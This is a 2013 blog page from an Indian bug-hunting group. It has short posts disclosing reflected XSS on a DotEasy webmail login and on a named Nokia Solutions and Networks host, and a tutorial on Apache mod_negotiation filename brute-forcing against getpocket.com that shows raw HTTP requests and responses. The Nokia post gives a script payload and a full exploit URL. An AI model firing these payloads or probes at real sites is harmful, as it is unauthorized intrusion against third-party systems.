KeralaCyberSquad-India

Tuesday, December 24, 2013

Reflected XSS on DotEasy WebHosting....

                                                  1) Goto DotEasy.com

2) Navigate to Web Mail Login on the top
and Insert your payload.
And hit Enter.


                                            3) You should get a prompt like I got...

Geetz to ...KeralaCyberSquad-India...
www.Facebook.com/KeralaCyberSquad
sherin.real1@gmail.com

Monday, December 23, 2013

Nokia Solutions and Networks reflected XSS


Nokia Solutions and Networks reflected XSS 



 Hello Geeks ,

Here is the POC of a Reflected XSS that I have found on Nokia Solutions and Network's domain https://rctool.access.nsn.com


[+] Vulnerable URL = https://rctool.access.nsn.com
[+] Vulnerable parameter =  err
[+] Payload used =  <SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] URL with malicious Payload= https://rctool.access.nsn.com/login.asp?login=false&err=<SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] Reported
[+] Duplicated
[+] Still Unfixed



Praveen Nair
Kerala Cyber Squad - India

Sunday, December 22, 2013

Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example

Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example

Hey Ya Geeks ,,

  
  Am Praveen Nair for Team Kerala Cyber Squad - India.
  Today am going to share a less known File-Name  bruteforcing ( File-name Buster ) Attack on Apache server , even though its risk level is low I found it interesting so thought of sharing it with you all, so lets go into it without wasting much time :)

  [+] THINGS YOU GONNA NEED 
  
 #>> A TOOL TO INTERCEPT THE HEADER REQUEST AND RESPONSE ( LIKE BURP , LIVE HTTP HEADER .....ETC ETC )
 #>> IMPORTANT THINGS >> GOOD EYES TO WATCH OUT FOR THE HOLES. :D
                       >> BRAIN TOO :p
  
  [+] TARGET =  Pocket's main-domain (i.e) http://getpocket.com/
  [+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability 
  
  #>> RISK :- INFORMATION DISCLOSURE ( LOW )
  
  #>> WHAT ACTUALLY IS THIS ATTACK ??? \0_0/
  
     The mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, look for backup files and so on.

MultiViews is an Apache option which acts with the following rules:

    If the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.
  #>> HOW TO ATTACK / VERIFICATION AND RE-GENERATION ?? :N
  
  It depends on several Accept* headers in the client Request.

    Accept
    Accept-Language
    Accept-Encoding

   SO, Let's see how it actually works:
   
   Turn on the INTERCEPTOR tool an stay connected.
   
   The case is, Suppose If an attacker requests "index" without any extension through a HTTP Header Request :
   
   All he have to do is just use http://site.com/index in the address bar and press enter (as here we have the target as http://getpocket.com/ ) lets see what have we got in the request header. 
   
   #>> HTTP Header Request :-
   
   GET http://getpocket.com/index  HTTP/1.1
   Host: getpocket.com
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Connection: keep-alive

 
   and here focus on the Parameter" Accept" with value "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" and as here we want */* value of Accept parameter request we use a "Accept:" header with an existent mime type ( */* ).
   
   
   #>> HTTP Header Response :-
   
   HTTP/1.1 200 OK
   Content-Location: index.php
   Content-Type: text/html; charset=UTF-8
   Date: Fri, 04 Oct 2013 18:10:48 GMT
   P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"
   Server: Apache
   Set-Cookie: sess_guid=by5A1g73dR504Tb2fup4e11phRT8d332f40B54F617tjt7a56416dma8rd7WU171; expires=Sat, 30-Sep-2028 18:10:48 GMT; path=/; domain=getpocket.com
   Set-Cookie: sess_start_time=1380910248; path=/; domain=.getpocket.com
   TCN: choice
   Vary: negotiate
   x-frame-options: SAMEORIGIN
   Transfer-Encoding: chunked
   Connection: keep-alive
   
   Now, it could be noticed that in the server response several interesting headers are out:

   Content-Location: index.php
   Vary: negotiate
   TCN: choice


   This means there is MultiViews enabled on / directory as it automatically selects the file index.php . 

 Let's see if in the request we use a "Accept:" header with an inexistent mime type ( test/hell ): 
   
  
   
    #>> HTTP Header Request :-
   
   GET http://getpocket.com/index  HTTP/1.1
   Host: getpocket.com
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
   Accept: test/hell
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Connection: keep-alive
   
   #>> HTTP Header Response :-
   
   HTTP/1.1 406 Not Acceptable
   Alternates: {"index.php" 1 {type text/html}}
   Content-Type: text/html; charset=iso-8859-1
   Date: Fri, 04 Oct 2013 18:23:33 GMT
   Server: Apache
   TCN: list
   Vary: negotiate
   Content-Length: 410
   Connection: keep-alive


   #>> OUTPUT :-

 
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
   <html><head>
   <title>406 Not Acceptable</title>
   </head><body>
   <h1>Not Acceptable</h1>
   <p>An appropriate representation of the requested resource /index could not be found on this server.</p>
   Available variants:
   <ul>
   <li><a href="index.php">index.php</a> , type text/html</li>
   </ul>
   <hr>
   <address>Apache Server at getpocket.com Port 80</address>
   </body></html>


  woo! With a single request we get a listing of all the files!  ;)

   Well,yeah. Not really *all* the files but every file with the same name requested and with an extension listed in mime-types file.

   This means that if index.whatever* is on the server it will be listed.

   Similarly, The attacker can use any file name in place of "index" in this case so as a result can  result in a filename bruteforcing with mod_negotiation an Apache module.
   
   Hope This Tut was a lil bit informational to you all ,. :)
   
   [+] This vulneability was reported to GetPocket Security Team, and as a result They rewarded me by adding my name in there Hall of Fame
      
   Thanks for having a look at this post . :)
   
   Please leave your comments below.
   
   Praveen Nair ( c0d3 c0m4dr3 404 )
   
Team - Kerala Cyber Squad - India
   ./xit n 0ut

     

Friday, December 20, 2013

Got Listed on BitWall Security Researchers List


Got Listed on BitWall Security Researchers List



We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India's member ( Praveen Nair ) have Got listed in on BitWall Security Researchers List

http://www.bitwall.io/security

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)